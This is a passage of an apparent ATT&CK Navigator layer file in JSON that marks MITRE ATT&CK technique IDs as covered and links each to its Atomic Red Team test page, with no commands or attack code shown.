Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1090.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1091","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1095","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1106","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1112","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1119","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1120","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1123","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1125","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1133","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1137.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1187","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1197","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1197","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1202","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1207","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1219","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1219","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1220","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1221","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1482","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1482","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1484","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1489","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1490","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1531","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1543.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.014","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1546.015","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1548.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1550.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":100,"enabled":true,"links":[{"label":"View 